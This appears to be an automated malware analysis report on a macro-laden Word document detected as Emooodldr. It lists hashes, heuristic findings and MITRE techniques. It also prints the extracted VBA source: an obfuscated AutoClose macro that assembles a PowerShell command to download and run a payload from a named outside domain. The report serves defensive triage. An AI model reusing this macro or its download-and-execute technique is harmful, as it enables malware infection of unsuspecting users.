Emooodldr Office (OOXML) malware analysis — malicious · 2ec2cf27a1b5e1af

MALICIOUS

Office (OOXML)

60.5 KB Created: 2017-11-29 23:43:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2019-08-04

MD5: 789336e5f87687eda0f9b1a57a8c10f3 SHA-1: 4b448b69ff6d34397beacc4e18dd79c40d5004f2 SHA-256: 2ec2cf27a1b5e1af7b771fff66d00ccfb8a5584c8f2867519f7fb8c9dbb7dbe4

264 Risk Score

Malware Insights

Emooodldr · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Malware.Emooodldr-6711604-0. Static analysis revealed VBA macros, specifically an AutoClose macro that calls CreateObject to execute a downloaded payload. The script attempts to download a file from 'http://yyqakuvunggjqidojzxqkuixnvwjuzv.com/REX/unlock.doc.doc?uid=nordc' and execute it, indicating a downloader functionality.

Heuristics 7

ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	5578 bytes
SHA-256: `446f4dbdd2e69c406e64c53dd8932f77927f8f4efc8f5c136c388b4ffd1791c4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoClose() dgyovqqfjxx = Val("3125") ivvzrgnvgwf = "juqcfgvwngy" + "" + "" + "byzcffr" Application.Run "cqdgynwycndyvwc" qkwwxonb = "fkvckxbuoqyxwjicyuwocggvco" + "" xcywgvfz = "kckgwy" + "dqddbw" + "qwzkig" + "krwjzky" End Sub Sub cqdgynwycndyvwc() nfrqfizfqxf = "xjq" + "" + "qnddcvbcd" dvfnnoq = Val("4449") kfycfwnvvkcoc = "vfnfgqyvfzojowgnxnkxdjxzcyrunggjqidojzxhgnxnkxdjxzcyll.gnxnkxdjxzcyxgnxnkxdjxzcy -Exgnxnkxdjxzcyc Byvfnfgqyvfzojqkuixnvwjuzvunggjqidojzxunggjqidojzx -NoP -NoExigcrkvgzwyqxb -Coiuruongojfgqiuruongojfgqqkuixnvwjuzvnd ignxnkxdjxzcyx((Ngnxnkxdjxzcyw-Objgnxnkxdjxzcycgcrkvgzwyqxb Syunggjqidojzxgcrkvgzwyqxbgnxnkxdjxzcyiuruongojfgq.Ngnxnkxdjxzcygcrkvgzwyqxb.WgnxnkxdjxzcybClignxnkxdjxzcyngcrkvgzwyqxb).DownloqkuixnvwjuzvdSgcrkvgzwyqxbring('hgcrkvgzwyqxbgcrkvgzwyqxbvfnfgqyvfzoj://yyqkuixnvwjuzvunggjqidojzxdhwdqkuixnvwjuzvhwdqkuixnvwjuzvunggjqidojzxdunggjqidojzxqkuixnvwjuzv.coiuruongojfgq/REX/unggjqidojzxlick.vfnfgqyvfzojhvfnfgqyvfzoj?ugcrkvgzwyqxbiuruongojfgqqkuixnvwjuzv=nordc'))" kfycfwnvvkcoc = ivxjjfrnzrjnwknqc(kfycfwnvvkcoc, "iuruongojfgq", "m") yibnfjkxrknx = "bjjfzfduzjyzvfddonwwcqkzqkxj" + "zwywknwuxzviwzcdkvuff" obxwizgo = Val("3604") woujywvb = -183 kfycfwnvvkcoc = ivxjjfrnzrjnwknqc(kfycfwnvvkcoc, "qkuixnvwjuzv", "a") qqndovo = "oqbckbbxikzxogbjykvzxkfzd" + "djiq" + "" + "wbwi" kwijgxoqf = -225 jjgrycfwz = 4548 ivrwyfgrbzd = 2730 cnuijxcwnkkn = "" + "bqjgq" + "qbwdbnuydfczwfoc" quocbxjjqign = 3385 kfycfwnvvkcoc = ivxjjfrnzrjnwknqc(kfycfwnvvkcoc, "unggjqidojzx", "s") kogkigzod = "uroudzqqqznr" + "zuxgcgzqfucrxrrydkkkr" + "kooidxcdxwibfdkng" iobbyrnfxc = 1365 uqwxgrfj = "izcrvrqvnzvqdndgbxqi" + "" + "" + "oqnykkbqc" yknyynqk = Val("-731") kfycfwnvvkcoc = ivxjjfrnzrjnwknqc(kfycfwnvvkcoc, "gcrkvgzwyqxb", "t") rvvyowuvccnq = Val("-687") duxbcrbdr = 4357 kiryxcfkvzg = "wczkbcfd" + "xbfcwd" + "gyvkfg" + "vnzdgyzkjcnnyn" kfycfwnvvkcoc = ivxjjfrnzrjnwknqc(kfycfwnvvkcoc, "gnxnkxdjxzcy", "e") ijujfvbjnbxc = 1323 zzujvjoyucg = "qncuxwziogicqi" + "fvbfjvkfzcikrkd" + "" guxdjguxkri = Val("-188") bzzjugdnvdo = -617 djnvkznoynq = Val("3060") doxygjkwd = "dogjnwgxdcbdnwungzwoxconfbjd" + "" + "" + "xcijxonxjkwyunj" kfycfwnvvkcoc = ivxjjfrnzrjnwknqc(kfycfwnvvkcoc, "vfnfgqyvfzoj", "p") vvrfxqfzo = "gvxwqdrgoovykvfn" + "yfviybrnqrwx" + "" + "" + "" uxirfrvdodq = "cr" + "xugyqv" dfukfkggkk = "" + "" + "" + "" cvyvivbn = -541 yiqnkrdfccz = "qbiwyq" + "qvjdcv" + "cokbwnn" + "knovcufz" + "rkorow" yqkuvqg = Val("1781") rkxboycxnznrxc = "WScriubkqzvqzjwvcbfgidciyduvx.Shrdyggjwyqovvll" rkxboycxnznrxc = ivxjjfrnzrjnwknqc(rkxboycxnznrxc, "dnvrucgjnqrk", "m") yibnfjkxrknx = "bjjfzfduzjyzvfddonwwcqkzqkxj" + "zwywknwuxzviwzcdkvuff" rkxboycxnznrxc = ivxjjfrnzrjnwknqc(rkxboycxnznrxc, "cyqrifqrbbfz", "a") qqndovo = "oqbckbbxikzxogbjykvzxkfzd" + "djiq" + "" + "wbwi" kwijgxoqf = -225 uwozcqu = "bj" + "xwnjdcjfdy" + "jyxwcqy" + "kozuriycofkxjo" + "kdxvgbbnbxkqfvg" + "grdurwj" ndbcrkxkuxdr = 4980 rkxboycxnznrxc = ivxjjfrnzrjnwknqc(rkxboycxnznrxc, "cfgqudvzdqqu", "s") kogkigzod = "uroudzqqqznr" + "zuxgcgzqfucrxrrydkkkr" + "kooidxcdxwibfdkng" iobbyrnfxc = 1365 uqwxgrfj = "izcrvrqvnzvqdndgbxqi" + "" + "" + "oqnykkbqc" rkxboycxnznrxc = ivxjjfrnzrjnwknqc(rkxboycxnznrxc, "bfgidciyduvx", "t") rvvyowuvccnq = Val("-687") duxbcrbdr = 4357 rkxboycxnznrxc = ivxjjfrnzrjnwknqc(rkxboycxnznrxc, "rdyggjwyqovv", "e") ijujfvbjnbxc = 1323 zzujvjoyucg = "qncuxwziogicqi" + "fvbfjvkfzcikrkd" + "" guxdjguxkri = Val("-188") zwqrqrunr = 672 nzkyddoqzn = "boinywgzwkk" + "iniobn" rkxboycxnznrxc = ivxjjfrnzrjnwknqc(rkxboycxnznrxc, "ubkqzvqzjwvc", "p") vvrfxqfzo = "gvxwqdrgoovykvfn" + "yfviybrnqrwx" + "" + "" + "" uxirfrvdodq = "cr" + "xugyqv" dfukfkggkk = "" + "" + "" + "" qbkrxnkfxnyq = "dyxjnzdqfzznnwgr ... (truncated)
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	21504 bytes
SHA-256: `cf3740a8fe9a7fe6d132c39348f116521db8f4e49173fee115acea3c6acd8a2d`
Detection ClamAV: Doc.Malware.Emooodldr-6711604-0 Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).

Open this report in the interactive analyzer, or submit your own file for analysis.